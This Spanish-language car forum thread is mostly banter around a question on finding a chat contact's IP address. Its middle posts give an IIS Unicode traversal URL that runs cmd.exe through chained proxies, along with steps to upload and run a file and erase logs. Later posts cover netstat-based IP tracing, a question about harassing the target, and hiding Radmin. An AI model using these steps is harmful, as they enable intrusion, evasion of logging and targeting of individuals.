como saber ip de alguien por el msn

Eloy

Forista Senior
Modelo
320ci - e46
Reacciones
19
SkolgeaR;5562743 dijo:
Que me pases el Messenger donde tienes a todas las tias que espias con la cam bribón !!!! ... Chorbo Messenger !!!! ... :descojon::descojon::descojon::descojon:

Estas salio mamon :descojon:

javier

Forista Legendario
Moderador
Miembro del Club
Reacciones
143
estas salio

:floor: :floor: :floor: :floor: :floor: :floor: :floor: :floor: :floor:

Eloy

Forista Senior
Modelo
320ci - e46
Reacciones
19
javier di algo de ips y dns que sino este post degenera, entre las niñas, mi erotismo, maikel jakson y el salio... :floor:

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
javier;5564455 dijo:

Vesteeeeeeeeeeeee a la mierdaaaaaaaaaaaaaaaaaaaaaa !!!!

:descojon::descojon::descojon::descojon:

Eloy;5565344 dijo:
javier di algo de ips y dns que sino este post degenera, entre las niñas, mi erotismo, maikel jakson y el salio... :floor:

Y tu tambien ... :descojon::descojon: :finga::finga::finga:

Eloy

Forista Senior
Modelo
320ci - e46
Reacciones
19
SkolgeaR;5566393 dijo:
Vesteeeeeeeeeeeee a la mierdaaaaaaaaaaaaaaaaaaaaaa !!!!

:descojon::descojon::descojon::descojon:

Y tu tambien ... :descojon::descojon: :finga::finga::finga:

yo?????? pero si soy mas salao que las pesetas :descojon:

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
Eloy;5568567 dijo:
yo?????? pero si soy mas salao que las pesetas :descojon:

Pues hay tienes un motivo más !! Salio !! ke diga ... salao !!! :finga::finga::finga:

L

little_homer

Invitado
Ojo con iniciar transferncias de correo o webcam i mirar por el netstat que al revés también puede hacerlo biggrinbiggrin si lo haces bien tienes que hacer ocultamiento de IP biggrin

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
Tecno_vikingo;5569378 dijo:
eso me dicen a mi las nenas :finga::finga:....tambien me dicen salio :cry:

No serán que te dicen solamente salio, y tu cambias la segunda vocal debido a tu continuo estado de embriaguez ??? jajajaja ... :descojon::descojon:

Aunque si te llaman salao, tambien es malo, porque es lo que suelen decir para los hombres que ellas destinan a sus amigos y confesores... Vease ejemplo de frases tipo como:

"Aiii, que salao que es"
"Te has dado cuenta que simpatico"
"No hay nadie como tu de amigo"
"Queee majooooo ... "

:descojon::descojon::descojon::descojon::descojon::descojon:

javier

Forista Legendario
Moderador
Miembro del Club
Reacciones
143
little_homer;5568996 dijo:
Ojo con iniciar transferncias de correo o webcam i mirar por el netstat que al revés también puede hacerlo biggrinbiggrin si lo haces bien tienes que hacer ocultamiento de IP biggrin

ocultamiento de ip : tecnica juanker que consiste en cambiar tu ip para que en el otro pc solo se vea x.x.x.x :descojon::descojon::descojon::descojon::descojon::descojon::descojon:

Cuando Albert dice esto se refiere a usar un servidor externo de salto, por ejemplo un proxy o un servidor de socks.

salu2.

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
javier;5569400 dijo:
Cuando Albert dice esto se refiere a usar un servidor externo de salto, por ejemplo un proxy o un servidor de socks.

salu2.

Eso está clarisimo hombre ...

Tecno_vikingo;5569495 dijo:
por fin se va controlando el post:descojon:

Si, mejor ... :descojon::descojon:

javier

Forista Legendario
Moderador
Miembro del Club
Reacciones
143
SkolgeaR;5569535 dijo:
Eso está clarisimo hombre ...

joer..... MI PC ---> servidor proxy que permita encadenar en no se donde --> servidor proxy que permita encadenar en no se donde --> n veces servidor proxy que permita encadenar en no se donde --> DESTINO

te configuras un proxy en el navegador (proxyA) y despues, por ejemplo para el unicode:

http://ProxyB:puerto/http://ProxyC:puerto/http://www.la_web_que_sea.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\

Subes un fichero por ftp (ejecutando desde el servidor) , renombras, editas para que se ejecute, borras logs y listo.

si el ataque no es http o https pues sencillo buscas alguno que soporte socks5, "socksificas" y listo ;-)

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
javier;5569817 dijo:
joer..... MI PC ---> servidor proxy que permita encadenar en no se donde --> servidor proxy que permita encadenar en no se donde --> n veces servidor proxy que permita encadenar en no se donde --> DESTINO

te configuras un proxy en el navegador (proxyA) y despues, por ejemplo para el unicode:

http://ProxyB:puerto/http://ProxyC:.../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\

Subes un fichero por ftp (ejecutando desde el servidor) , renombras, editas para que se ejecute, borras logs y listo.

si el ataque no es http o https pues sencillo buscas alguno que soporte socks5, "socksificas" y listo ;-)

Pufff, ahora me ha quedado clarisimo del todo !!!! Espera que voy hacerlo dos o tres veces por hobby ... :descojon::descojon::descojon:

Madre mia, yo me perdi muchas clases de esto,,,

javier

Forista Legendario
Moderador
Miembro del Club
Reacciones
143
SkolgeaR;5569890 dijo:
Pufff, ahora me ha quedado clarisimo del todo !!!! Espera que voy hacerlo dos o tres veces por hobby ... :descojon::descojon::descojon:

Madre mia, yo me perdi muchas clases de esto,,,

oño pense que tu te "dedicabas" a esto... como siempre andas con cacharreria para vender :descojon::descojon::descojon::descojon::descojon:

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
javier;5569902 dijo:
oño pense que tu te "dedicabas" a esto... como siempre andas con cacharreria para vender :descojon::descojon::descojon::descojon::descojon:

*** Informacion Confidencial ***

:descojon::descojon::descojon:

En resumen y despues del tocho biografico,,, se un poco de todo, pero no se mucho de algo (en estos temas tecnicos) ... :finga:

javier

Forista Legendario
Moderador
Miembro del Club
Reacciones
143
vale ya te entiendo... te tengo que dar pues las gracias por muchas pelis que he visto pues :floor: :floor: :floor:

javier

Forista Legendario
Moderador
Miembro del Club
Reacciones
143
ah! mejor edita tu post ;-) para que no salga en el google por busquedas. ;-)

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
javier;5569953 dijo:
vale ya te entiendo... te tengo que dar pues las gracias por muchas pelis que he visto pues :floor: :floor: :floor:

Seguramente alguna, si ... :descojon::descojon::descojon:

javier;5569960 dijo:
ah! mejor edita tu post ;-) para que no salga en el google por busquedas. ;-)

Ahora lo edito, pero que vamos, no han podido antes con más, no van hacer ahora nada por eso ... jejeje ;-)

F

Fco_530D

Invitado
SkolgeaR;5569535 dijo:

pero si eres tu el que la lia siempre!!!!biggrinbiggrin

SkolgeaR;5569948 dijo:
En resumen y despues del tocho biografico,,, se un poco de todo, pero no se mucho de algo (en estos temas tecnicos) ... :finga:

yo de todo lo demas no sabre nada,pero de IP's y DNS...ni p***a ideabiggrin

SkolgeaR

Clan Leader
Modelo
30D E90
Reacciones
34
Tecno_vikingo;5570215 dijo:
pero si eres tu el que la lia siempre!!!!biggrinbiggrin

yo de todo lo demas no sabre nada,pero de IP's y DNS...ni p***a ideabiggrin

Eso es la mala fama que me creais vosotros mamones !!! #-o :finga::finga::finga:

J

jaun2

Invitado
Opción 1: si te ha enviado un email entonces en opciones avanzadas de hotmail te dice la IP de quien te lo envió.
Opción 2: cierra todas las ventanas de programas, internet y demas, dejando sólo la del messenger con la ventanita de este usuario. Consigue que te envie un archivo a traves de messenger y mientras tanto abres MS-DOS y escribes: "netstat -a". Así te dices todas las IP conectadas a tu equipo (por eso lo de dejar únicamente abierta la ventanita del messenger de esa persona)

F

Fco_530D

Invitado
jaun2;5573066 dijo:
Opción 1: si te ha enviado un email entonces en opciones avanzadas de hotmail te dice la IP de quien te lo envió.
Opción 2: cierra todas las ventanas de programas, internet y demas, dejando sólo la del messenger con la ventanita de este usuario. Consigue que te envie un archivo a traves de messenger y mientras tanto abres MS-DOS y escribes: "netstat -a". Así te dices todas las IP conectadas a tu equipo (por eso lo de dejar únicamente abierta la ventanita del messenger de esa persona)

se me acaba de ocurrir..[-( este post es para saber las ips de otra persona,pero de que manera se la podria "putear"?

M

miskuit

Invitado
mira tienes ke estableces cualkier tipo de coneccion, una transferecnai webcam o lo k sea, escribes netstat -a en la shell y ahi tiene la ip, pero como ya fue mensionado puede no tener ip fija, o claro tb la puedes sacar el correo.

averigua sobre el ocultar Radmin(claro k primero tienes k saber lo k es radmin)

una vez k averigues , diras pfff k facil

javier

Forista Legendario
Moderador
Miembro del Club
Reacciones
143
miskuit;5632998 dijo:
mira tienes ke estableces cualkier tipo de coneccion, una transferecnai webcam o lo k sea, escribes netstat -a en la shell y ahi tiene la ip, pero como ya fue mensionado puede no tener ip fija, o claro tb la puedes sacar el correo.

averigua sobre el ocultar Radmin(claro k primero tienes k saber lo k es radmin)

una vez k averigues , diras pfff k facil

:descojon::descojon::descojon::descojon: bienvenido :descojon::descojon:

lo de mirarlo desde la shell esta chulo... que hago inicio--> ejecutar --> cmd --> /bin/bash ? :descojon::descojon::descojon:

de lo que comenta el compi del correo y para quien le interese es mirar simplemente el campo X-original IP en las cabeceras aunque muchas MTAs lo estripan para que no se vea.